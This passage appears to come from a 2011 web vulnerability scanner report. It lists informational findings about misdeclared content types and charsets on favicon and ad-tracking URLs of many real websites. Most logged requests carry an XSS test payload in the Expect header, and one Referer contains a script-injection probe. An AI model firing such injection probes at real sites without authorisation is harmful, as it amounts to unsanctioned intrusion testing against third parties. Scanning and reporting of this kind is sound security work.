Severity:	Information
Confidence:	Certain
Host:	http://www.youngcourtesans.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.youngcourtesans.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.54
Date: Fri, 01 Apr 2011 16:11:53 GMT
Content-Type: text/html
Content-Length: 169
Connection: keep-alive

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/0.8.54</center>
</body>
</html>

16.138. http://www.yourdegree.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.yourdegree.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.yourdegree.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: UrlRewriter.NET 2.0.0
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:48:22 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

17. HTML uses unrecognised charset previous next
There are 3 instances of this issue:

http://www.163.com/favicon.ico
http://www.soccer.com/favicon.ico
http://www.xiongdudu.com/favicon.ico

17.1. http://www.163.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Tentative
Host:	http://www.163.com
Path:	/favicon.ico

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

gb2312

Request

Response

17.2. http://www.soccer.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Tentative
Host:	http://www.soccer.com
Path:	/favicon.ico

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

<TLVAR

Request

Response

HTTP/1.1 404 Not Found
Content-Length: 41217
Content-Type: text/html
Server: Microsoft-IIS/6.0
Date: Fri, 01 Apr 2011 16:49:22 GMT
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=<TLVAR NAME="CHARSET" TRIM="both" />
<meta http-equiv="Content-Language" content="en-us" />
...[SNIP]...

17.3. http://www.xiongdudu.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Tentative
Host:	http://www.xiongdudu.com
Path:	/favicon.ico

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

GB2312

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.xiongdudu.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Date: Fri, 01 Apr 2011 17:14:44 GMT
Content-Length: 1308
Content-Type: text/html
Server: Microsoft-IIS/6.0

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>............</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=GB2312">
<STYLE type="text/css">
...[SNIP]...

18. Content type incorrectly stated previous next
There are 121 instances of this issue:

http://ad.doubleclick.net/pfadx/aeriagames_cim/
http://event.adxpose.com/event.flow
http://view.c3metrics.com/c3VTabstrct-6-2.php
http://view.c3metrics.com/v.js
http://www.1800mobiles.com/favicon.ico
http://www.4jobs.com/favicon.ico
http://www.800adfrenzy.com/favicon.ico
http://www.activediner.com/favicon.ico
http://www.allheart.com/favicon.ico
http://www.alloy.com/favicon.ico
http://www.americajob.com/favicon.ico
http://www.artsonia.com/favicon.ico
http://www.astrocenter.com/favicon.ico
http://www.athletic.net/favicon.ico
http://www.bakati.com/favicon.ico
http://www.barelist.com/favicon.ico
http://www.bebe.com/favicon.ico
http://www.bellasugar.com/favicon.ico
http://www.betus.com/favicon.ico
http://www.biblestudytools.com/favicon.ico
http://www.biblio.com/favicon.ico
http://www.big5sportinggoods.com/favicon.ico
http://www.bizbuysell.com/favicon.ico
http://www.blockbusterexpress.com/favicon.ico
http://www.bradsdeals.com/favicon.ico
http://www.brainpop.com/favicon.ico
http://www.brownells.com/favicon.ico
http://www.buildacareer.net/favicon.ico
http://www.buzzsugar.com/favicon.ico
http://www.cambridge.org/date/writeYear_js.asp
http://www.cambridge.org/uk/date/writeYear_js.asp
http://www.careerplanner.com/favicon.ico
http://www.caring4cancer.com/favicon.ico
http://www.carsforsale.com/favicon.ico
http://www.casasugar.com/favicon.ico
http://www.cbsatlanta.com/favicon.ico
http://www.cheaperthandirt.net/favicon.ico
http://www.cheapostay.com/favicon.ico
http://www.clipartcastle.com/favicon.ico
http://www.codeplex.com/favicon.ico
http://www.covers.com/favicon.ico
http://www.craigslist.com.au/favicon.ico
http://www.craigslist.de/favicon.ico
http://www.custom404error.com/favicon.ico
http://www.dailystrength.org/favicon.ico
http://www.dailytech.com/favicon.ico
http://www.dealio.com/favicon.ico
http://www.deltadental.com/favicon.ico
http://www.diapers.com/favicon.ico
http://www.dinodirect.com/favicon.ico
http://www.directron.com/favicon.ico
http://www.dltk-holidays.com/favicon.ico
http://www.fabsugar.com/favicon.ico
http://www.findstuff.com/favicon.ico
http://www.foodnetworkstore.com/favicon.ico
http://www.frontdoor.com/favicon.ico
http://www.genealogybank.com/favicon.ico
http://www.greatdreams.com/favicon.ico
http://www.gsnrecipes.com/favicon.ico
http://www.hometeamsonline.com/favicon.ico
http://www.iforex.com/favicon.ico
http://www.inforum.com/favicon.ico
http://www.installiq.com/favicon.ico
http://www.installiqlearnmore.com/favicon.ico
http://www.insureme.com/favicon.ico
http://www.interweave.com/favicon.ico
http://www.jobappnetwork.com/favicon.ico
http://www.jobvite.com/favicon.ico
http://www.k12jobspot.com/favicon.ico
http://www.kitv.com/favicon.ico
http://www.klm.com/favicon.ico
http://www.ksat.com/favicon.ico
http://www.leapfish.com/favicon.ico
http://www.mail2web.com/favicon.ico
http://www.maps.com/favicon.ico
http://www.mattel.com/favicon.ico
http://www.meaning-of-names.com/favicon.ico
http://www.melaleuca.com/favicon.ico
http://www.mercantila-checkout.com/setcookie.js
http://www.mercantila.com/website/common/commonbroker.php
http://www.mercantila.com/website/shoppingcart/cartbroker.php
http://www.mirror.co.uk/favicon.ico
http://www.ms.gov/favicon.ico
http://www.mt.gov/favicon.ico
http://www.myhuckleberry.com/favicon.ico
http://www.mysun.co.uk/favicon.ico
http://www.nairaland.com/favicon.ico
http://www.naturallycurly.com/favicon.ico
http://www.newretirement.com/favicon.ico
http://www.news-medical.net/favicon.ico
http://www.nwf.org/favicon.ico
http://www.owners.com/favicon.ico
http://www.pennystockalley.com/favicon.ico
http://www.personalizationmall.com/favicon.ico
http://www.printfree.com/favicon.ico
http://www.puma.com/favicon.ico
http://www.rcuniverse.com/favicon.ico
http://www.redrobin.com/favicon.ico
http://www.rk.com/favicon.ico
http://www.roirocket.com/favicon.ico
http://www.rubytuesday.com/favicon.ico
http://www.sanityswitch.com/favicon.ico
http://www.shaadi.com/favicon.ico
http://www.soap.com/favicon.ico
http://www.southwestvacations.com/favicon.ico
http://www.starbucksstore.com/favicon.ico
http://www.strefa.pl/favicon.ico
http://www.sulekha.com/favicon.ico
http://www.syracuse.com/favicon.ico
http://www.tennis-warehouse.com/favicon.ico
http://www.theage.com.au/favicon.ico
http://www.tressugar.com/favicon.ico
http://www.tstickets.com/favicon.ico
http://www.venus.com/favicon.ico
http://www.w3i.com/favicon.ico
http://www.web.com/favicon.ico
http://www.williamsauction.com/favicon.ico
http://www.wlky.com/favicon.ico
http://www.worldwidelearn.com/favicon.ico
http://www.yellowusa.com/favicon.ico
http://www.yourdegree.com/favicon.ico

18.1. http://ad.doubleclick.net/pfadx/aeriagames_cim/ previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://ad.doubleclick.net
Path:	/pfadx/aeriagames_cim/

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain CSS.

Request

Response

18.2. http://event.adxpose.com/event.flow previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://event.adxpose.com
Path:	/event.flow

Issue detail

The response contains the following Content-type statement:

Content-Type: text/javascript;charset=UTF-8

The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /event.flow?eventcode=000_000_12&location=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Fpagead%2Fads%3Fclient%3Dca-pub-8825891582215045%26output%3Dhtml%26h%3D250%26slotname%3D9743825372%26w%3D300%26lmt%3D1301699500%26flash%3D10.2.154%26url%3Dhttp%253A%252F%252Fwww.quickyellow.com%252F%26dt%3D1301681500418%26bpp%3D2%26shv%3Dr20110324%26jsv%3Dr20110321-2%26prev_slotnames%3D8282812667%26correlator%3D1301681500450%26frm%3D0%26adk%3D3051422498%26ga_vid%3D1234146098.1301681501%26ga_sid%3D1301681501%26ga_hid%3D936317177%26ga_fc%3D0%26u_tz%3D-300%26u_his%3D3%26u_java%3D1%26u_h%3D1200%26u_w%3D1920%26u_ah%3D1156%26u_aw%3D1920%26u_cd%3D16%26u_nplug%3D9%26u_nmime%3D44%26biw%3D1118%26bih%3D1004%26fu%3D0%26ifi%3D2%26dtd%3D145%26xpc%3DHEyqJzw6JK%26p%3Dhttp%253A%2F%2Fwww.quickyellow.com&uid=ZC45X9Axu6NOUFfX_289669&xy=0%2C0&wh=300%2C250&vchannel=69112&cid=166308&cookieenabled=1&screenwh=1920%2C1200&adwh=300%2C250&colordepth=16&flash=10.2&iframed=1 HTTP/1.1
Host: event.adxpose.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-8825891582215045&output=html&h=250&slotname=9743825372&w=300&lmt=1301699500&flash=10.2.154&url=http%3A%2F%2Fwww.quickyellow.com%2F&dt=1301681500418&bpp=2&shv=r20110324&jsv=r20110321-2&prev_slotnames=8282812667&correlator=1301681500450&frm=0&adk=3051422498&ga_vid=1234146098.1301681501&ga_sid=1301681501&ga_hid=936317177&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1118&bih=1004&fu=0&ifi=2&dtd=145&xpc=HEyqJzw6JK&p=http%3A//www.quickyellow.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=69a5d959-2383-46d3-a91e-54766c81e851

Response

18.3. http://view.c3metrics.com/c3VTabstrct-6-2.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://view.c3metrics.com
Path:	/c3VTabstrct-6-2.php

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=72&rv=&uid=&td= HTTP/1.1
Host: view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://www.ny1.com/favicon.ico?80003'-alert(1)-'46fe3f653ad=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=15400897811300976568; 480-VT=drive_03-24-2011-14-22-48_15008318461300976568ZZZZadver_03-28-2011-19-48-35_18309878591301341715

Response

18.4. http://view.c3metrics.com/v.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://view.c3metrics.com
Path:	/v.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain CSS.

Request

Response

18.5. http://www.1800mobiles.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.1800mobiles.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=iso-8859-1

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.1800mobiles.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Fri, 01 Apr 2011 16:41:12 GMT
Cache-Control: private
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 19

expectation failed"

18.6. http://www.4jobs.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.4jobs.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

18.7. http://www.800adfrenzy.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.800adfrenzy.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

18.8. http://www.activediner.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.activediner.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

18.9. http://www.allheart.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.allheart.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=iso-8859-1

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.allheart.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Fri, 01 Apr 2011 16:09:05 GMT
Cache-Control: private
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 19

expectation failed"

18.10. http://www.alloy.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.alloy.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.alloy.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.0 200 OK
Date: Fri, 01 Apr 2011 16:29:55 GMT
Server: Apache/2.0.52 (Oracle)
ETag: W/"1718-1281238393000"
Last-Modified: Sun, 08 Aug 2010 03:33:13 GMT
Content-Length: 1718
Content-Type: text/plain; charset=UTF-8
Age: 142
X-Cache: HIT from www.alloy.com
Via: 1.0 www.alloy.com:80 (squid/2.6.STABLE18)
Connection: close

..............(...&...........h...N...(....... ................................................................................................... ....... .... .. .... .. ..................... . .....
...[SNIP]...

18.11. http://www.americajob.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.americajob.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

18.12. http://www.artsonia.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.artsonia.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
Date: Fri, 01 Apr 2011 17:07:08 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

18.13. http://www.astrocenter.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.astrocenter.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

18.14. http://www.athletic.net/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.athletic.net
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

18.15. http://www.bakati.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.bakati.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

18.16. http://www.barelist.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.barelist.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

18.17. http://www.bebe.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.bebe.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=iso-8859-1

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bebe.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Fri, 01 Apr 2011 16:02:09 GMT
Server: Server
Content-Length: 14
Content-Type: text/html; charset=iso-8859-1

Expect problem

18.18. http://www.bellasugar.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.bellasugar.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bellasugar.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
X-Sugar-Origin-Server: sugar-prod-web013-lax1.int.sugarinc.com
X-Powered-By: PHP/5.2.14
Content-Type: image/gif
Server: lighttpd/1.4.26
Content-Length: 435
Date: Fri, 01 Apr 2011 16:34:36 GMT
Connection: close

.PNG
.
...IHDR................a....tEXtSoftware.Adobe ImageReadyq.e<...UIDATx..SKJ.A.}3F..f@....Jp5...O....@=...&7HN.7p.n...w.RW..JL...ji'.4>(.W.UuUw..n......uL.V...1l......<.[!.....
.. .f......|M..
...[SNIP]...

18.19. http://www.betus.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.betus.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

18.20. http://www.biblestudytools.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.biblestudytools.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

18.21. http://www.biblio.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.biblio.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.biblio.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 01 Apr 2011 16:20:06 GMT
Content-Type: text/plain; charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=60
Last-Modified: Mon, 21 Jun 2010 20:19:48 GMT
ETag: "a6cb13-37e-4899006ba2100"
Accept-Ranges: bytes
Content-Length: 894
Vary: User-Agent
Expires: Sat, 02 Apr 2011 16:20:06 GMT
Cache-Control: max-age=86400
Cache-Control: no-cache

..............h.......(....... .....................................yw.PK.a[.pn.yw.{z...............................C@f.H..V..S.R..P.M!.X*'_JKz..................=:b.K..W..]#.`$.]".X..Q..N.D..Lrq.
...[SNIP]...

18.22. http://www.big5sportinggoods.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.big5sportinggoods.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

18.23. http://www.bizbuysell.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.bizbuysell.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

18.24. http://www.blockbusterexpress.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.blockbusterexpress.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

18.25. http://www.bradsdeals.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.bradsdeals.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

18.26. http://www.brainpop.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.brainpop.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.brainpop.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Server: Apache/2.0.63 (Unix)
Last-Modified: Sun, 02 Dec 2007 16:54:09 GMT
ETag: "170d530-13e-44050832a6e40"
Accept-Ranges: bytes
Content-Length: 318
Content-Type: text/plain
Date: Fri, 01 Apr 2011 16:06:54 GMT
Connection: close

..............(.......(....... ........................................d............F..............d...,V.:q..........@@@................##/....""22....""##...../......"""#.../"""".... . ..... . .....
...[SNIP]...

18.27. http://www.brownells.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.brownells.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

18.28. http://www.buildacareer.net/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.buildacareer.net
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

18.29. http://www.buzzsugar.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.buzzsugar.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.buzzsugar.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
X-Sugar-Origin-Server: sugar-prod-web015-lax1.int.sugarinc.com
X-Powered-By: PHP/5.2.14
Content-Type: image/gif
Server: lighttpd/1.4.26
Content-Length: 423
Date: Fri, 01 Apr 2011 17:13:07 GMT
Connection: close

.PNG
.
...IHDR................a....gAMA.....OX2....tEXtSoftware.Adobe ImageReadyq.e<...9IDATx.b...?.20I..............gf./@.d............~p.....=....|..........d..T`=L...0C...!...z...<...9.&. !......
...[SNIP]...

18.30. http://www.cambridge.org/date/writeYear_js.asp previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.cambridge.org
Path:	/date/writeYear_js.asp

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

18.31. http://www.cambridge.org/uk/date/writeYear_js.asp previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.cambridge.org
Path:	/uk/date/writeYear_js.asp

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

18.32. http://www.careerplanner.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.careerplanner.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

18.33. http://www.caring4cancer.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.caring4cancer.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

18.34. http://www.carsforsale.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.carsforsale.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

18.35. http://www.casasugar.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.casasugar.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.casasugar.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
X-Sugar-Origin-Server: sugar-prod-web017-lax1.int.sugarinc.com
X-Powered-By: PHP/5.2.14
Content-Type: image/gif
Server: lighttpd/1.4.26
Content-Length: 192
Date: Fri, 01 Apr 2011 16:22:55 GMT
Connection: close

.PNG
.
...IHDR...............h6....gAMA.....OX2....tEXtSoftware.Adobe ImageReadyq.e<...RIDATx.b....@
`b ..@(.."d.o}}h...?..z5B...........$.k`.W.....,.)#.M...[.....4... ...`.....A....IEND.B`.

18.36. http://www.cbsatlanta.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.cbsatlanta.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cbsatlanta.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 22 Jan 2009 12:35:41 GMT
ETag: "29153f6-37e-82a48140"
Accept-Ranges: bytes
Content-Length: 894
Content-Type: text/plain
Cache-Control: max-age=1817
Expires: Fri, 01 Apr 2011 16:12:42 GMT
Date: Fri, 01 Apr 2011 15:42:25 GMT
Connection: close

..............h.......(....... ...........@........................................................................................tttjjj...................................................777......
...[SNIP]...

18.37. http://www.cheaperthandirt.net/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.cheaperthandirt.net
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

18.38. http://www.cheapostay.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.cheapostay.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

18.39. http://www.clipartcastle.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.clipartcastle.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

18.40. http://www.codeplex.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.codeplex.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

18.41. http://www.covers.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.covers.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

